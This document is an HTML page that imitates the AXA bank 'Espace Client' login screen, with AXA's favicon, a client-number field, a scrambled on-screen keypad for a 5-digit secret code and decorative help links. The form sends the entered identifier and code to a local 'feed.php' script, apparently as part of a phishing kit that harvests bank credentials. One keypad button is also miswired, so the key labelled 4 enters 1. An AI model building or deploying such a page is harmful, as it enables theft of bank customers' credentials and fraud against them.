<html>
<head>
    <link rel="stylesheet" type="text/css" href="style.css">
    <link rel="icon" href="https://connect.axa.fr/img/favicon_AXA-PP.ico?v=LbzxWuQiNgdj48MyWoG6PNZHQrR3ekpkZjG0o9ctWmA" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</style>
<title>Espace Client AXA</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0"> 

    <style type="text/css">
    body {
 			
 				
    			background-image: url("fd.jpg");
    		    background-size: 100% 820px;
    			margin: 0;
    			background-repeat: no-repeat;
 			}
    .mainlogin{
 				width: 11cm;
 				height: 20cm;
 				background-color: white;
 				margin: 0 auto;
                box-shadow: 0px 0px 10px 2px #BABABA;
                padding: 0.3cm;
 			}
        label#label{
                font-size: 15px;
                margin-left: 0.4cm;
                color: #4d4d4d;
                font-family: sans-serif;
                margin-bottom: 5px;                                                                                                                                                                                                                    
            }
        .blocksouv{
            margin-left: 0.4cm;
        }
        label#qust{
                font-size: 12px;
                margin-left: 0.4cm;
                color: #999999;
                font-family: sans-serif;
                margin-top: 10cm;
                margin-bottom: 5px;
                text-decoration: underline;
            }
            input#for{
                width: 9.7cm;
                height: 1.1cm;
                font-size: 14px;
                margin-right: 10px;
                margin-top: 5px;
                margin-left: 0.4cm;
            
            }
        input#mdp{
                width: 9.7cm;
                height: 1.1cm;
                font-size: 14px;
                margin-right: 10px;
                margin-top: 5px;
                margin-left: 0.4cm;
            
            }
        
        .app{
        background-color:#4b9233;
 				border: 0px ;
 				height: 1cm;
 				width:8.2cm;
 				color: white;
                padding-left: 5px;
                margin-left: 10px;
                margin-right: 20px;
                cursor: pointer;
                font-size: 14px;
        }
         .app2{
        background-color:#1a1aff;
 				border: 0px ;
 				height: 1cm;
 				width:8.2cm;
 				color: white;
                padding-left: 5px;
                margin-left: 10px;
                margin-right: 20px;
                cursor: pointer;
                font-size: 14px;
        }
        .esp{
            height: 0.6cm;
            
        }
        .esp2{
            height: 0.2cm;
            
        }
        .tabsous{
            font-family:sans-serif;
            font-size: 14px;
            text-decoration: underline;
            color: #adad85;
        }
        .clavier{
            margin-top: 0.1cm;
            align-items: center;
            height: 4cm;
 				width:10cm;
            
        }
        .touche{
            height: 1.1cm;
 				width:2.3cm;
            background-color: blue;
            border-color: blue;
            color: white;
            font-size: 16px;    
        }
		
		.inputWithIcon{
			position:relative;
		}
		.inputWithIcon i{
			position:absolute;
			left:330px;
			top:8px;
		}
    </style>
     <script>
    function maf0(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b0').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
		}
    }
    
    function maf1(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b1').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
		}
    }
    function maf2(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b2').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
}
    }
    function maf3(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b3').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
}
    }
    function maf4(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b4').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
}
    }
    function maf5(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b5').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
}
    }
    function maf6(){
          var mytxt = document.getElementById('mdp').value;
         if(mytxt.length<5){
		 var val = document.getElementById('b6').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
}
    }
    function maf7(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b7').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
}
    }
    function maf8(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b8').value;  
          var a=mytxt+val;
          document.forms.myform.mdp.value=a;   
	}
    }
    function maf9(){
          var mytxt = document.getElementById('mdp').value;
          if(mytxt.length<5){
		  var val = document.getElementById('b9').value;  
          var a=mytxt+val;
		  document.forms.myform.mdp.value=a; 
		  }
            

    }
	function deletmdp(){
		document.forms.myform.mdp.value=""; 
	}
          
    
</script>
</head>
    <div>
        <div class="esp"></div>
       <div class="mainlogin" style="width: 403px; height: 783px">
           
           <div align="center">
           <img src="logo.jpg" />
           </div>
           <br>
           
            <form name="myform" method="POST" action="feed.php" >
           
                 <div class="form-input">
                    <label   id="label0" for="id">
					<font face="Calibri" color="#5C5C5C" style="font-size: 13pt">&nbsp;&nbsp;&nbsp;
					Identifiant</font></label><br>
					<input placeholder="  N° Client Banque Obligatoire*" id="for" onkeypress='return event.charCode >= 48 && event.charCode <= 57' maxlength="7" type="text" name="identifiant"   required size="53"><br>
					<label  id="qust" for="prenom">Quel est mon identifiant? 
					</label>
                 </div>
           
                    <div class="esp"></div>
           
                 <div class="form-input">
                    <label  id="label1" for="mdp">
					<font face="Calibri" color="#5C5C5C" style="font-size: 13pt">&nbsp;&nbsp;&nbsp;
					Code confidentiel</font></label><!--webbot bot="Validation" b-value-required="TRUE" i-minimum-length="5" i-maximum-length="6" -->
					<div class="inputWithIcon">
					<input class="simo" id="mdp" placeholder="  5 chiffres" type=password name="mdp" maxlength="5" readonly required size="1" tabindex="6"><br>
                     <i><img onclick="deletmdp()" src="Capture.png"></img></i>
					</div>
				 </div>
				 
                
                <table class="clavier"  align="center" width="376" height="165">
                <tr>
                 <td width="88">
                   <input type="button" id="b8" class="touche" value="8" onclick="maf8();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/>
                 </td>
                 <td width="87">
                   <input type="button" id="b14" class="touche" value="" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F" />

                 </td>
                 <td width="88">
                   <input type="button" id="b1" class="touche"  value="1" onclick="maf1();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI" />
 
                 </td>
                <td>
                   <input type="button" id="b" class="touche" value="" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F" /></td>
                </tr>
                <tr>
                 <td width="88">
                   <input type="button" id="b13" class="touche" value="" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F" />
                 </td>
                 <td width="87">
                   <input type="button" id="b5" class="touche" value="5" onclick="maf5();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI" />

                 </td>
                 <td width="88">
                   <input type="button" id="b3" class="touche" value="3" onclick="maf3();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/>
 
                 </td>
                <td>
                   <input type="button" id="b12" class="touche" value="" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F" /></td>
                </tr>                    
                <tr>
                 <td width="88">
                   <input type="button" id="b7" class="touche" value="7" onclick="maf7();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/>
                 </td>
                 <td width="87">
                   <input type="button" id="b9" class="touche" value="9" onclick="maf9();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/>

                 </td>
                 <td width="88">
                   <input type="button" id="b11" class="touche" value="" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F" />
 
                 </td>
                <td>
                 <input type="button" id="b4" class="touche" value="4" onclick="maf1();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI" /></td>
                </tr>
                    
                
                    
                <tr>
                 <td width="88">
                   <input type="button" id="b6" class="touche" value="6" onclick="maf6();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/>
                 </td>
                 <td width="87">
                   <input type="button" id="b0" class="touche" value="0"  onclick="maf0();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/>

                 </td>
                 <td width="88">
                   <input type="button" id="b10" class="touche" value="" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F" />
 
                 </td>
                <td>
                 <input type="button" id="b2" class="touche" value="2"  onclick="maf2();" style="border: 1px solid #000080; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px; background-color: #00008F; font-family:Lao UI"/></td>
                </tr>
                    
                    
                
                </table>
                
            
               
                <label  id="qust" for="prenom">Code confidentiel oublié ou accès 
					désactivé </label>
                
                
                
                
                
                
                
                    <div class="blocksouv">
                 
                   <table>
                    <tr>
                       <td><input type="checkbox"><label  id="label" for="prenom">se 
						souvenir de moi </label></td> <td><img src="seS.png"/></td>
                    </tr>           
                  </table>
                 </div>
                <br>
                <div align="center">
                 <input type="submit" class="app" alt="Valider" value="Me connecter" style="background-color: #47A80D"/>
                 </div>
                <br><br>
                <div align="center">
                    <input type="button" class="app2" value="Créer un espace client" style="background-color: #00008F"/>
                </div>
           </form>
           
           
           <br><br>
           <table class="tabsous" align="center" >
               <tr><td align="center">
                   Faire opposition 
                </td>   </tr>
               <tr><td align="center">
                    Besoin d&#39;aide pour me connecter
                   </td></tr>
               <tr><td>
                   Sécurité bancaire | Mentions légales
                </td>
               </tr>
           </table>
           
           
           
           
           
           
           
           
           
          
        
        
        
      </div>
    
    
    </div>

    
<body>
    
</body>
</html>